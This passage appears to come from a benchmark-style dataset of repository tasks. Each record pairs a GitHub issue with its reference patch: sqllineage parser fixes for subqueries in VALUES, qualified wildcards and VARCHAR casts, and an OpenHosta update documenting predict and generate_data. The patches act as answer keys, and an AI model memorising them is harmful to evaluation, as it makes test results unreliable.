@@ -237,7 +237,7 @@ def _extract_from_dml(
@classmethod
def parse_subquery(cls, token: TokenList) -> List[SubQuery]:
result = []
- if isinstance(token, (Identifier, Function, Where)):
+ if isinstance(token, (Identifier, Function, Where, Values)):
# usually SubQuery is an Identifier, but not all Identifiers are SubQuery
# Function for CTE without AS keyword
result = cls._parse_subquery(token)
diff --git a/sqllineage/core/parser/sqlparse/utils.py b/sqllineage/core/parser/sqlparse/utils.py
index 2a397a94..312dafef 100644
--- a/sqllineage/core/parser/sqlparse/utils.py
+++ b/sqllineage/core/parser/sqlparse/utils.py
@@ -10,6 +10,7 @@
Identifier,
Parenthesis,
TokenList,
+ Values,
Where,
)
from sqlparse.tokens import DML, Keyword, Name, Wildcard
@@ -99,7 +100,7 @@ def is_values_clause(token: Parenthesis) -> bool:
def get_subquery_parentheses(
- token: Union[Identifier, Function, Where]
+ token: Union[Identifier, Function, Values, Where]
) -> List[SubQueryTuple]:
"""
Retrieve subquery list
@@ -115,7 +116,7 @@ def get_subquery_parentheses(
if isinstance(token, Function):
# CTE without AS: tbl (SELECT 1)
target = token.tokens[-1]
- elif isinstance(token, Where):
+ elif isinstance(token, (Values, Where)):
# WHERE col1 IN (SELECT max(col1) FROM tab2)
target = token
else:
@@ -131,6 +132,11 @@ def get_subquery_parentheses(
subquery.append(SubQueryTuple(tk.right, tk.right.get_real_name()))
elif is_subquery(tk):
subquery.append(SubQueryTuple(tk, token.get_real_name()))
+ elif isinstance(target, Values):
+ for row in target.get_sublists():
+ for col in row:
+ if is_subquery(col):
+ subquery.append(SubQueryTuple(col, col.get_real_name()))
elif is_subquery(target):
target = remove_parenthesis_between_union(target)
subquery = [
| Support subquery in VALUES clause
```python
import logging

from sqllineage.runner import LineageRunner

verify_sql = "INSERT INTO taba (a1, b1) VALUES (1, (SELECT max(bb) FROM tabb));"
analysis_result = LineageRunner(sql=verify_sql, dialect="ansi")
logging.info(f'source_tables: {analysis_result.source_tables}')
```
As mentioned above, `source_tables` is empty; does this need to be fixed?
| sqllineage version is 1.4.5
This is the first time I have seen SQL with a subquery in the VALUES clause. I never even imagined this was allowed. So it's only natural that we don't have analyzing logic targeting this. We can add support for it. This should be an easy one.
By the way, can you share the actual SQL dialect/database that you're running this SQL with?
Hello, your email has been received. Wishing you a good mood every day! | 2023-08-27T06:54:26 | 0.0 | [] | [] |
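To make the expected extraction concrete: the subquery inside the VALUES clause references `tabb`, which should appear as a source table. The real fix walks the parse tree (see the `values_clause` handling in the patch above); the stdlib-only toy heuristic below is a hypothetical helper, not part of sqllineage, and merely illustrates the idea:

```python
import re

def tables_in_values_subqueries(sql: str) -> list:
    # Grab everything after the VALUES keyword, then pick table names that
    # follow FROM inside parenthesized SELECT subqueries. This is a toy
    # heuristic, not a parser: quoting, nesting and joins are ignored.
    match = re.search(r"\bVALUES\b(.*)", sql, re.IGNORECASE | re.DOTALL)
    if not match:
        return []
    return re.findall(
        r"\(\s*SELECT\b.*?\bFROM\s+([\w.]+)",
        match.group(1),
        re.IGNORECASE | re.DOTALL,
    )

sql = "INSERT INTO taba (a1, b1) VALUES (1, (SELECT max(bb) FROM tabb));"
print(tables_in_values_subqueries(sql))  # ['tabb']
```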
||
reata/sqllineage | reata__sqllineage-430 | bff222cec7aa2523a5f98ad45dadffae772b0760 | diff --git a/sqllineage/core/parser/sqlfluff/extractors/dml_merge_extractor.py b/sqllineage/core/parser/sqlfluff/extractors/dml_merge_extractor.py
index 2495c829..89bbba80 100644
--- a/sqllineage/core/parser/sqlfluff/extractors/dml_merge_extractor.py
+++ b/sqllineage/core/parser/sqlfluff/extractors/dml_merge_extractor.py
@@ -13,6 +13,7 @@
)
from sqllineage.core.parser.sqlfluff.models import SqlFluffSubQuery, SqlFluffTable
from sqllineage.core.parser.sqlfluff.utils import (
+ extract_column_qualifier,
extract_identifier,
extract_innermost_bracketed,
get_child,
@@ -93,11 +94,15 @@ def extract(
for set_clause in get_children(set_clause_list, "set_clause"):
columns = get_children(set_clause, "column_reference")
if len(columns) == 2:
- src_col = Column(extract_identifier(columns[1]))
- src_col.parent = direct_source
- tgt_col = Column(extract_identifier(columns[0]))
- tgt_col.parent = list(holder.write)[0]
- holder.add_column_lineage(src_col, tgt_col)
+ src_col = tgt_col = None
+ if src_cqt := extract_column_qualifier(columns[1]):
+ src_col = Column(src_cqt.column)
+ src_col.parent = direct_source
+ if tgt_cqt := extract_column_qualifier(columns[0]):
+ tgt_col = Column(tgt_cqt.column)
+ tgt_col.parent = list(holder.write)[0]
+ if src_col is not None and tgt_col is not None:
+ holder.add_column_lineage(src_col, tgt_col)
for merge_when_not_matched_clause in get_children(
merge_match, "merge_when_not_matched_clause"
):
@@ -107,20 +112,22 @@ def extract(
insert_columns = []
if bracketed := get_child(merge_insert, "bracketed"):
for column_reference in get_children(bracketed, "column_reference"):
- tgt_col = Column(extract_identifier(column_reference))
- tgt_col.parent = list(holder.write)[0]
- insert_columns.append(tgt_col)
+ if cqt := extract_column_qualifier(column_reference):
+ tgt_col = Column(cqt.column)
+ tgt_col.parent = list(holder.write)[0]
+ insert_columns.append(tgt_col)
if values_clause := get_child(merge_insert, "values_clause"):
if bracketed := get_child(values_clause, "bracketed"):
for j, e in enumerate(
get_children(bracketed, "literal", "expression")
):
if column_reference := get_child(e, "column_reference"):
- src_col = Column(
- extract_identifier(column_reference)
- )
- src_col.parent = direct_source
- holder.add_column_lineage(
- src_col, insert_columns[j]
- )
+ if cqt := extract_column_qualifier(
+ column_reference
+ ):
+ src_col = Column(cqt.column)
+ src_col.parent = direct_source
+ holder.add_column_lineage(
+ src_col, insert_columns[j]
+ )
return holder
diff --git a/sqllineage/core/parser/sqlfluff/models.py b/sqllineage/core/parser/sqlfluff/models.py
index 10fb704a..6c603092 100644
--- a/sqllineage/core/parser/sqlfluff/models.py
+++ b/sqllineage/core/parser/sqlfluff/models.py
@@ -6,6 +6,7 @@
from sqllineage import SQLPARSE_DIALECT
from sqllineage.core.models import Column, Schema, SubQuery, Table
from sqllineage.core.parser.sqlfluff.utils import (
+ extract_column_qualifier,
extract_identifier,
is_subquery,
is_wildcard,
@@ -111,8 +112,11 @@ def of(column: BaseSegment, **kwargs) -> Column:
if source_columns:
column_name = None
for sub_segment in list_child_segments(column):
- if sub_segment.type == "column_reference":
- column_name = extract_identifier(sub_segment)
+ if sub_segment.type == "column_reference" or is_wildcard(
+ sub_segment
+ ):
+ if cqt := extract_column_qualifier(sub_segment):
+ column_name = cqt.column
elif sub_segment.type == "expression":
# special handling for postgres style type cast, col as target column name instead of col::type
if len(sub2_segments := list_child_segments(sub_segment)) == 1:
@@ -130,7 +134,10 @@ def of(column: BaseSegment, **kwargs) -> Column:
if (
sub3_segment := sub3_segments[0]
).type == "column_reference":
- column_name = extract_identifier(sub3_segment)
+ if cqt := extract_column_qualifier(
+ sub3_segment
+ ):
+ column_name = cqt.column
return Column(
column.raw if column_name is None else column_name,
source_columns=source_columns,
@@ -149,12 +156,11 @@ def _extract_source_columns(segment: BaseSegment) -> List[ColumnQualifierTuple]:
:param segment: segment to be processed
:return: list of extracted source columns
"""
- if segment.type == "identifier" or is_wildcard(segment):
- return [ColumnQualifierTuple(segment.raw, None)]
- if segment.type == "column_reference":
- parent, column = SqlFluffColumn._get_column_and_parent(segment)
- return [ColumnQualifierTuple(column, parent)]
- if segment.type in NON_IDENTIFIER_OR_COLUMN_SEGMENT_TYPE:
+ col_list = []
+ if segment.type in ("identifier", "column_reference") or is_wildcard(segment):
+ if cqt := extract_column_qualifier(segment):
+ col_list = [cqt]
+ elif segment.type in NON_IDENTIFIER_OR_COLUMN_SEGMENT_TYPE:
sub_segments = list_child_segments(segment)
col_list = []
for sub_segment in sub_segments:
@@ -172,8 +178,7 @@ def _extract_source_columns(segment: BaseSegment) -> List[ColumnQualifierTuple]:
):
res = SqlFluffColumn._extract_source_columns(sub_segment)
col_list.extend(res)
- return col_list
- return []
+ return col_list
@staticmethod
def _get_column_from_subquery(
@@ -229,12 +234,4 @@ def _get_column_and_alias(
):
res = SqlFluffColumn._extract_source_columns(sub_segment)
columns += res if res else []
-
return columns, alias
-
- @staticmethod
- def _get_column_and_parent(col_segment: BaseSegment) -> Tuple[Optional[str], str]:
- identifiers = list_child_segments(col_segment)
- if len(identifiers) > 1:
- return identifiers[-2].raw, identifiers[-1].raw
- return None, identifiers[-1].raw
diff --git a/sqllineage/core/parser/sqlfluff/utils.py b/sqllineage/core/parser/sqlfluff/utils.py
index 0697bc11..8957494c 100644
--- a/sqllineage/core/parser/sqlfluff/utils.py
+++ b/sqllineage/core/parser/sqlfluff/utils.py
@@ -12,7 +12,7 @@
from sqlfluff.core.parser import BaseSegment
-from sqllineage.utils.entities import SubQueryTuple
+from sqllineage.utils.entities import ColumnQualifierTuple, SubQueryTuple
def is_negligible(segment: BaseSegment) -> bool:
@@ -228,6 +228,23 @@ def extract_as_and_target_segment(
return as_segment, target
+def extract_column_qualifier(segment: BaseSegment) -> Optional[ColumnQualifierTuple]:
+ cqt = None
+ if is_wildcard(segment):
+ identifiers = segment.raw.split(".")
+ column = identifiers[-1]
+ parent = identifiers[-2] if len(identifiers) > 1 else None
+ cqt = ColumnQualifierTuple(column, parent)
+ elif segment.type == "column_reference":
+ sub_segments = list_child_segments(segment)
+ column = sub_segments[-1].raw
+ parent = sub_segments[-2].raw if len(sub_segments) > 1 else None
+ cqt = ColumnQualifierTuple(column, parent)
+ elif segment.type == "identifier":
+ cqt = ColumnQualifierTuple(segment.raw, None)
+ return cqt
+
+
def extract_innermost_bracketed(bracketed_segment: BaseSegment) -> BaseSegment:
# in case of subquery in nested parenthesis like: `SELECT * FROM ((table))`, find the innermost one first
while True:
| qualified wildcard recognized as wrong column name
The following SQL query uses "sales" as an alias for "T_SALES". How could I ask the `LineageRunner()` to return the table/view name rather than the alias?
```sql
-- sample_query_with_semicolons.sql
SELECT CUST_ID, CUST_NAME, CUST_CITY, CUST_COUNTRY
INTO #TEMP_CUSTOMERS
FROM T_CUSTOMERS
WHERE CUST_COUNTRY = 'USA';
SELECT CUST.*
, SALES.CUM_SALES
INTO #TEMP_FINAL_RESULTS
FROM #TEMP_CUSTOMERS AS CUST
LEFT JOIN T_SALES AS SALES
ON CUST.CUST_ID = SALES.CUST_ID
WHERE SALES.CUST_ID IS NULL;
SELECT *
FROM #TEMP_FINAL_RESULTS;
```
```python
from sqllineage.runner import LineageRunner
import csv
import pandas as pd
# read text from sample_query.sql
sql_script = open('sample_query_with_semicolons.sql', 'r').read()
# parse sql_script with LineageRunner
parsed_results = LineageRunner(sql_script, dialect="tsql")
# write parsed_results to data frame
df = pd.DataFrame(parsed_results.get_column_lineage())
df.columns = ['Source', 'Target']
print(df)
```
Expected output:
Source | Target
---|---
`<default>.t_customers.cust_city` | `<default>.#temp_customers.cust_city`
`<default>.t_customers.cust_country` | `<default>.#temp_customers.cust_country`
`<default>.t_customers.cust_id` | `<default>.#temp_customers.cust_id`
`<default>.t_customers.cust_name` | `<default>.#temp_customers.cust_name`
`<default>.`**t_sales.cum_sales** | `<default>.#temp_final_results.cum_sales`
`<default>.#temp_customers.cust.*` | `<default>.#temp_final_results.cust.*`
Actual output:
Source | Target
---|---
`<default>.t_customers.cust_city` | `<default>.#temp_customers.cust_city`
`<default>.t_customers.cust_country` | `<default>.#temp_customers.cust_country`
`<default>.t_customers.cust_id` | `<default>.#temp_customers.cust_id`
`<default>.t_customers.cust_name` | `<default>.#temp_customers.cust_name`
`<default>.sales.cum_sales` | `<default>.#temp_final_results.cum_sales`
`<default>.#temp_customers.cust.*` | `<default>.#temp_final_results.cust.*`
| Thanks for reporting this. I can confirm this is a bug we should fix.
I found the problem is with the second statement:
```sql
FROM #TEMP_CUSTOMERS CUST AS CUST
```
@crossxwill Can you help confirm this is valid syntax instead of
```sql
FROM #TEMP_CUSTOMERS AS CUST
```
For this case, we actually should throw an exception because there are parsing errors. Later, if this proves to be valid syntax, we can fix the parser.
You found a typo in my example. I fixed it. The bug still remains.
Now with #429 merged, we will raise InvalidSyntaxException for previously buggy sql:
```sql
SELECT CUST.*
, SALES.CUM_SALES
INTO #TEMP_FINAL_RESULTS
FROM #TEMP_CUSTOMERS CUST AS CUST
LEFT JOIN T_SALES AS SALES
ON CUST.CUST_ID = SALES.CUST_ID
WHERE SALES.CUST_ID IS NULL;
```
```
$ sqllineage -f test.sql --dialect=tsql -l column
...
sqllineage.exceptions.InvalidSyntaxException: This SQL statement is unparsable, please check potential syntax error for SQL:
SELECT CUST.*
, SALES.CUM_SALES
INTO #TEMP_FINAL_RESULTS
FROM #TEMP_CUSTOMERS CUST AS CUST
LEFT JOIN T_SALES AS SALES
ON CUST.CUST_ID = SALES.CUST_ID
WHERE SALES.CUST_ID IS NULL;
Line 4, Position 27: Found unparsable section: 'AS CUST\nLEFT JOIN T_SALES AS SALES\nON CU...'
```
Back to this story, the problem is still limited to the second statement. It seems we have some issue handling aliases with the SELECT INTO statement. Using the code in the master branch, this is the output:
```
$ sqllineage -f test.sql --dialect=tsql -l column
<default>.#temp_final_results.cum_sales <- <default>.t_sales.cum_sales
<default>.#temp_final_results.cust.* <- cust.*
```
Whereas the expected output should be:
```
<default>.#temp_final_results.cum_sales <- <default>.t_sales.cum_sales
<default>.#temp_final_results.* <- <default>.#temp_customers.*
```
The problem is not with SELECT INTO; rather, all qualified wildcards suffer from the same issue:
```sql
INSERT INTO tab1
SELECT tab2.*
FROM tab2 a
INNER JOIN tab3 b
ON a.id = b.id
```
```
<default>.tab1.tab2.* <- tab2.*
```
The correct output should be:
```
<default>.tab1.* <- <default>.tab2.*
``` | 2023-08-13T10:51:06 | 0.0 | [] | [] |
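The `extract_column_qualifier` helper added in the patch handles exactly this case: a qualified wildcard such as `tab2.*` is split into the column `*` with qualifier `tab2`, instead of being treated as a column literally named `tab2.*`. A minimal sketch of that splitting logic (the field names mirror sqllineage's `ColumnQualifierTuple`):

```python
from collections import namedtuple

ColumnQualifierTuple = namedtuple("ColumnQualifierTuple", ["column", "qualifier"])

def split_qualified_wildcard(raw: str) -> ColumnQualifierTuple:
    # "tab2.*" -> column "*" qualified by "tab2"; a bare "*" has no qualifier
    identifiers = raw.split(".")
    column = identifiers[-1]
    qualifier = identifiers[-2] if len(identifiers) > 1 else None
    return ColumnQualifierTuple(column, qualifier)

print(split_qualified_wildcard("tab2.*"))  # ColumnQualifierTuple(column='*', qualifier='tab2')
print(split_qualified_wildcard("*"))       # ColumnQualifierTuple(column='*', qualifier=None)
```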
||
reata/sqllineage | reata__sqllineage-420 | e72aa11c5dc14c3d58b3b357f29290e5d69f7c91 | diff --git a/sqllineage/core/parser/sqlparse/models.py b/sqllineage/core/parser/sqlparse/models.py
index adda43f3..d5fa9388 100644
--- a/sqllineage/core/parser/sqlparse/models.py
+++ b/sqllineage/core/parser/sqlparse/models.py
@@ -152,7 +152,7 @@ def _extract_source_columns(token: Token) -> List[ColumnQualifierTuple]:
elif isinstance(token, Identifier):
real_name = token.get_real_name()
# ignore function dtypes that don't need to check for extract column
- FUNC_DTYPE = ["decimal", "numeric"]
+ FUNC_DTYPE = ["decimal", "numeric", "varchar"]
has_function = any(
isinstance(t, Function) and t.get_real_name() not in FUNC_DTYPE
for t in token.tokens
| Column lineage does not work for CAST to Parameterized Data Type
I guess the issue is that "Type(*)" is recognized as a subquery, instead of a type, in "CAST(col AS Type(*))".
Input SQL:
```sql
INSERT
OVERWRITE tbl_dst(col1, col2)
SELECT
CAST(name AS VARCHAR) AS col1,
CAST(age AS VARCHAR(35)) AS col2
FROM
tbl_src
```
Expected Output:
```
<default>.tbl_dst.col1 <- name
<default>.tbl_dst.col2 <- age
```
Current Output:
`<default>.tbl_dst.col1 <- name`
You're right. We don't support parameterized data types yet. Also `decimal(18, 0)` doesn't work while `decimal` works, for the same underlying reason.
This is a bug we should fix. | 2023-07-30T15:34:04 | 0.0 | [] | [] |
||
hand-e-fr/OpenHosta | hand-e-fr__OpenHosta-168 | 87cd5cdc10632b0f60fb76f0d0bd4d256860e907 | diff --git a/README.md b/README.md
index 3c193e2..abd4310 100644
--- a/README.md
+++ b/README.md
@@ -1,5 +1,5 @@
# OpenHosta
-v2.0.2 - Opensource Project
+v2.1.0rc-1 - Opensource Project
**- The future of development is human -**
@@ -79,7 +79,7 @@ For further questions or assistance, please refer to partner hand-e or contact u
**Authors**:
- Emmanuel Batt: Manager and Coordinator, Founder of Hand-e
- William Jolivet: DevOps, SysAdmin
- - Léandre Ramos: MLOps, IA developer
+ - Léandre Ramos: IA developer
- Merlin Devillard: UX designer, Product Owner
GitHub: https://github.com/hand-e-fr/OpenHosta
diff --git a/docs/doc.md b/docs/doc.md
index e698170..c8efa53 100644
--- a/docs/doc.md
+++ b/docs/doc.md
@@ -79,8 +79,16 @@ Let's **get started**! First here's the **table of contents** to help you naviga
- [Body Functions](#body-functions)
- [`Example`](#example)
- [`Thought`](#thought)
+ - [`predict` Function](#predict-function)
+ - [PredictConfig](#predictconfig-class)
- [`thinkof` Function](#thinkof-function)
- [`ask` function](#ask-function)
+ - [`generate_data` func](#generate_data-func)
+ - [Parameters](#parameters)
+ - [Returns](#returns)
+ - [Raises](#raises)
+ - [Example](#example)
+ - [How It Works](#how-it-works)
- [Advanced configuration](#advanced-configuration)
- [Models](#models)
- [Inheriting from the Model Class](#inheriting-from-the-model-class)
@@ -182,7 +190,7 @@ from typing import List
def example_function(a:int, b:str)->List[str]:
```
- - **The doctring** is the other key element. This is where you describe the behavior of the function. Be precise and concise. Describe the input parameters and the nature of the output, as in a docstring. Feel free to try out lots of things, prompt engineering is not a closed science. :)
+ - **The docstring** is the other key element. This is where you describe the behavior of the function. Be precise and concise. Describe the input parameters and the nature of the output, as in a docstring. Feel free to try out lots of things, prompt engineering is not a closed science. :)
```python
my_model = config.Model(
@@ -205,7 +213,7 @@ def find_name_age(sentence:str, id:dict)->dict:
"""
return emulate(model=my_model)
-ret = find_name_age("l'âge du capitaine est d'un an de plus que celui du mousse qui a lui 22 ans", {"capitaine": 0, "mousse": 0})
+ret = find_name_age("the captain's age is one year more than the cabin boy's, who is 22 years old", {"captain": 0, "cabin boy": 0})
print(ret)
```
@@ -353,6 +361,141 @@ print(car_advice("I would two buy a new car, but I would like an electric becaus
# [{'task': 'identify the context and the need of the user'}, {'task': 'Look at the car available to find a car matching his needs'}, {'task': 'Return the most relevant car, if no car is matching return None'}, {'task': 'identify the context and the need of the user'}, {'task': 'Look at the car available to find a car matching his needs'}, {'task': 'Return the most relevant car, if no car is matching return None'}]
```
+## `predict` Function
+
+The `predict` function is the second main feature of OpenHosta ! This function allows you to create **specific neural networks** based on the specifications you provide. Here's a breakdown to help you understand it:
+
+
+
+The `predict` function can be used in function or class method by simply returns it. Its primary goal is to create a model tailored to the function it is called in. Currently, it supports two model types:
+
+- **Linear Regression**: For prediction tasks, by simply returning an `int` or a `float`:
+ ```python
+  from OpenHosta import predict, config
+
+ config.set_default_apiKey("put-your-api-key-here")
+
+ def example_linear_regression(years : int, profession : str) -> float:
+ """
+      this function predicts the salary based on the profession and years of experience.
+ """
+ return predict(verbose=2)
+
+ print(example_linear_regression(1, "engineer"))
+ ```
+- **Classification**: For classifying values among predefined categories declared in a `Literal` from the typing module:
+ ```python
+ from typing import Literal
+ from Openhosta import predict, config
+
+  from OpenHosta import predict, config
+
+ output = Literal["Good", "Bad"]
+
+ def example_classification(word: str) -> output:
+ """
+      this function detects whether a word is good or bad
+ """
+ return predict(verbose=2)
+
+ print(example_classification("Bad"))
+ ```
+
+
+Additionally, as you can see, `predict` can generate a dataset if none is provided in the [PredictConfig](#predictconfig-class), allowing users to see how a large language model (LLM) understands the problem and generates relevant data. By default, data generation uses GPT-4o by OpenAI, the same oracle used in the [emulate](#emulate-function) function.
+
+
+
+### Parameters
+The `predict` function supports the following parameters:
+
+- `verbose`: Controls the level of output information:
+ - `0`: No output.
+ - `1`: Basic output (default).
+ - `2`: Detailed output.
+
+
+
+- `oracle`: Specifies the model used for data generation. If set to `None`, no model will be used to generate missing data.
+
+- `config`: Accepts a `PredictConfig` object for advanced configuration of model creation.
+
+## `PredictConfig` class
+
+The `PredictConfig` class provides advanced options for configuring the creation and management of *predict* models. Here’s a detailed breakdown:
+
+```python
+from OpenHosta import PredictConfig
+
+model_config = PredictConfig(
+ name="model_test",
+ path="./__hostacache__",
+ complexity=5,
+ growth_rate=1.5,
+ coef_layers=100,
+ epochs=100,
+ batch_size=32,
+ max_tokens=1,
+ dataset_path="./path_to_dataset.csv",
+ generated_data=100,
+ normalize=False
+)
+```
+
+### Features
+
+#### **Path Management**
+- `path` (`str`): Specifies where data will be stored. Default: `./__hostacache__/`.
+- `name` (`str`): Sets the directory name for storing model-related information. Default: the name of the Hosta-injected function.
+
+#### **Architecture Configuration**
+- `complexity` (`int`): Adjusts the model's complexity by adding or removing layers. Default: `5`.
+- `growth_rate` (`float`): Determines the rate of increase in layer size. Default: `1.5`.
+- `coef_layers` (`int`): Defines the maximum possible layer size based on the highest value between inputs and outputs. Default: `100`.
+
+#### **Training Configuration**
+- `normalize` (`bool`): Specifies whether the training data should be normalized between -1 and 1. Default: `False`; only available for **Linear Regression** models.
+- `epochs` (`int`): Sets the number of training iterations. Default: calculated based on dataset size and batch size.
+- `batch_size` (`int`): Specifies the number of examples processed before weight updates. Default: 5% of the dataset size if possible.
+
+#### **Dataset Management**
+- `max_tokens` (`int`): Limits the number of words a `str` input can contain, as the model adapts neuron sizes accordingly. Default: `1`.
+ - **Warning**: Current model architectures do not perform well with natural language processing tasks. For such cases, use the *emulate* feature instead. NLP architecture support is coming soon.
+- `dataset_path` (`str`): Provides a custom dataset path. Default: `None`.
+  - **Warning**: Only `csv` and `jsonl` files are supported for now. For `csv`, please set the prediction columns to `_outputs`; for `jsonl`, please set the last element
+- `generated_data` (`int`): Specifies the target number of data points for LLM generation (approximate). Default: `100`.
+
+---
+
+### Example Usage
+
+```python
+from OpenHosta import predict, PredictConfig
+
+# Configuring the model
+config_predict = PredictConfig(
+ path="./__hostacache__",
+ name="test_openhosta",
+ complexity=5,
+ growth_rate=1.5,
+    coef_layers=100,
+ epochs=45,
+ batch_size=64,
+ max_tokens=1,
+ dataset_path="./dataset.csv",
+ normalize=False
+)
+
+# Using the predict function with the configuration
+def demo_open_hosta(number: int, message: str) -> int:
+ """
+ this function is just here for an example :)
+ """
+ return predict(config=config_predict, oracle=None, verbose=2)
+
+print(demo_open_hosta(42, "Hello World!"))
+```
+
## `thinkof` Function
**Lambda** functions in Python provide a way to create small, anonymous functions. These are defined using the lambda keyword and can have any number of input parameters but only a single expression.
@@ -433,6 +576,83 @@ As seen above takes 2 or more argument. The two first arguments are mandatory. `
**Note** : ***this feature uses the default model.***
+## `generate_data` func
+
+Generate a dataset based on a given function and the number of samples. This function uses a synthetic data generator to create realistic input-output pairs for a given callable Python function based on its defined parameters, examples, and return type.
+
+### Parameters
+
+- **`func`** (`Callable`):
+ The target function used to generate the dataset. This function must take specific inputs and return outputs to be used for creating the dataset.
+ Proper type annotations and a clear docstring for the `func` are recommended to enhance the quality of generated data.
+
+- **`num_samples`** (`int`):
+ The number of samples to generate. If the number exceeds 100, the function intelligently splits the data requests into manageable chunks.
+
+- **`oracle`** (`Optional[Model]`, Optional):
+ The model or "oracle" used to assist with generating synthetic data.
+ By default, the function uses the system's predefined default model.
+
+- **`verbose`** (`Union[Literal[0, 1, 2], bool]`, default=`2`):
+ Defines the verbosity level for logging the data generation process:
+ - `0` or `False`: No logging.
+ - `1`: Minimal logging.
+ - `2` or `True`: Detailed logging, providing insights during data generation.
+
+### Returns
+
+- **`HostaDataset`**:
+ An instance of `HostaDataset`, representing the generated dataset. This dataset can be saved to disk (CSV, JSON, JSONL) or iterated over for input-output pairs.
+
+### Raises
+
+- **`TypeError`**:
+ Raised if the provided `func` is not callable or lacks sufficient information to generate data (such as missing type annotations).
+
+### Example
+
+The following example demonstrates how to define a function, generate synthetic data using `generate_data`, and save the resulting dataset.
+
+```python
+from typing import Literal
+from OpenHosta import generate_data, HostaDataset, example, emulate, SourceType
+
+def detect_mood(message: str) -> Literal["positive", "negative", "neutral"]:
+ """
+ Analyze the mood conveyed in a text message.
+ """
+ # Provide pre-defined examples to guide synthetic data generation
+ example(message="I feel lonely...", hosta_out="negative")
+ example(message="I am happy!", hosta_out="positive")
+ example(message="I have a cat", hosta_out="neutral")
+ return emulate()
+
+# Generate a dataset with 50 examples
+dataset: HostaDataset = generate_data(detect_mood, 50)
+
+# Save the dataset as a CSV file
+dataset.save_data("detect_mood.csv", SourceType.CSV)
+
+# Print each input-output pair in the dataset
+correct = 0
+
+for data in dataset.data:
+    message = data.input[0].strip('"')
+    prediction = detect_mood(message)
+    print(f"{message} expected {data.output} got {prediction}")
+    if data.output == prediction:
+        correct += 1
+
+print(f"Accuracy: {correct}/{len(dataset.data)}, {correct/len(dataset.data)*100}%")
+```
+
+### How It Works
+
+- **Define the Function**:
+ The target function (`detect_mood` in the example) must be well-defined, preferably with type annotations and examples to guide the data generation process.
+- **Generate Synthetic Data**:
+ Use `generate_data` to produce a dataset by specifying the number of samples and optionally overriding the default model with a custom `oracle`.
+- **Save or Process Dataset**:
+ The returned dataset (`HostaDataset` instance) provides methods to save it in various formats (CSV, JSON, JSONL) or iterate over its contents for further analysis.
+
## Advanced configuration
### Models
@@ -522,8 +742,8 @@ class MyModel(Model):
return l_ret
new_model = MyModel(
- model="model-name"
- base_url="base-url"
+ model="model-name",
+ base_url="base-url",
api_key="put-your-api-key-here"
)
diff --git a/pyproject.toml b/pyproject.toml
index e75f9c8..a17d697 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -18,12 +18,27 @@ license = {file = "LICENSE"}
requires-python = ">=3.8,<=3.13"
classifiers = [
"Development Status :: 5 - Production/Stable",
+ "Programming Language :: Python",
+ "Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
+ "Programming Language :: Python :: 3.9",
+ "Programming Language :: Python :: 3.10",
+ "Programming Language :: Python :: 3.11",
+ "Programming Language :: Python :: 3.12",
+ "Programming Language :: Python :: 3.13",
+ "Programming Language :: Python :: Implementation :: CPython",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Intended Audience :: Developers",
+ "Intended Audience :: Science/Research",
+ "Intended Audience :: Education",
"Natural Language :: French",
- "Topic :: Software Development :: Code Generators"
+ "Natural Language :: English",
+ "Topic :: Software Development :: Code Generators",
+ "Topic :: Scientific/Engineering",
+ "Topic :: Scientific/Engineering :: Artificial Intelligence",
+ "Topic :: Software Development :: Libraries",
+ "Typing :: Typed"
]
dependencies = [
"requests>=2.32.3",
diff --git a/qodana.yaml b/qodana.yaml
new file mode 100644
index 0000000..84e3e49
--- /dev/null
+++ b/qodana.yaml
@@ -0,0 +1,29 @@
+#-------------------------------------------------------------------------------#
+# Qodana analysis is configured by qodana.yaml file #
+# https://www.jetbrains.com/help/qodana/qodana-yaml.html #
+#-------------------------------------------------------------------------------#
+version: "1.0"
+
+#Specify inspection profile for code analysis
+profile:
+ name: qodana.starter
+
+#Enable inspections
+#include:
+# - name: <SomeEnabledInspectionId>
+
+#Disable inspections
+#exclude:
+# - name: <SomeDisabledInspectionId>
+# paths:
+# - <path/where/not/run/inspection>
+
+#Execute shell command before Qodana execution (Applied in CI/CD pipeline)
+#bootstrap: sh ./prepare-qodana.sh
+
+#Install IDE plugins before Qodana execution (Applied in CI/CD pipeline)
+#plugins:
+# - id: <plugin.id> #(plugin id can be found at https://plugins.jetbrains.com)
+
+#Specify Qodana linter for analysis (Applied in CI/CD pipeline)
+linter: jetbrains/qodana-python:latest
diff --git a/src/OpenHosta/OpenHosta.py b/src/OpenHosta/OpenHosta.py
index 81e861f..fbc6850 100644
--- a/src/OpenHosta/OpenHosta.py
+++ b/src/OpenHosta/OpenHosta.py
@@ -6,10 +6,15 @@
from .exec.thought import thought
from .exec.example import example
from .exec.emulate import emulate
+from .exec.generate_data import generate_data
+from .exec.predict.dataset.dataset import HostaDataset, SourceType
from .core import config
from .core.config import Model, DefaultManager
from .utils.meta_prompt import print_last_prompt
+from .exec.predict.predict import predict
+from .exec.predict.predict_config import PredictConfig
+
import os
DefaultManager.set_default_model(
@@ -22,8 +27,13 @@
"emulate",
"thought",
"example",
+ "predict",
+ "PredictConfig",
"thinkof",
"ask",
"EMULATE_PROMPT",
- "print_last_prompt"
+ "print_last_prompt",
+ "generate_data",
+ "HostaDataset",
+ "SourceType"
)
diff --git a/src/OpenHosta/core/analizer.py b/src/OpenHosta/core/analizer.py
index ca7b346..537d8a8 100644
--- a/src/OpenHosta/core/analizer.py
+++ b/src/OpenHosta/core/analizer.py
@@ -145,10 +145,10 @@ def func_call(self) -> Tuple[str, OrderedDict[str, Any]]:
@property
def func_type(self) -> Tuple[List[Any], Any]:
"""
- Get the _inputs and _outputs types of the function.
+ Get the inputs and outputs types of the function.
Returns:
- A tuple containing the _inputs types and _outputs type.
+ A tuple containing the inputs types and outputs type.
"""
input_types = [
param.annotation for param in self.sig.parameters.values()
diff --git a/src/OpenHosta/core/checker.py b/src/OpenHosta/core/checker.py
index 06a11db..7778ea3 100644
--- a/src/OpenHosta/core/checker.py
+++ b/src/OpenHosta/core/checker.py
@@ -15,15 +15,15 @@
class HostaChecker:
"""
- A class used to check and convert the _outputs of a Language Model (LLM) to the type specified in a function's annotation.
+ A class used to check and convert the outputs of a Language Model (LLM) to the type specified in a function's annotation.
Args:
- func (Func): A function object that contains the type annotations for the LLM _outputs.
- data (dict): A dictionary containing the LLM _outputs data to be checked and converted.
+ func (Func): A function object that contains the type annotations for the LLM outputs.
+ data (dict): A dictionary containing the LLM outputs data to be checked and converted.
Attributes:
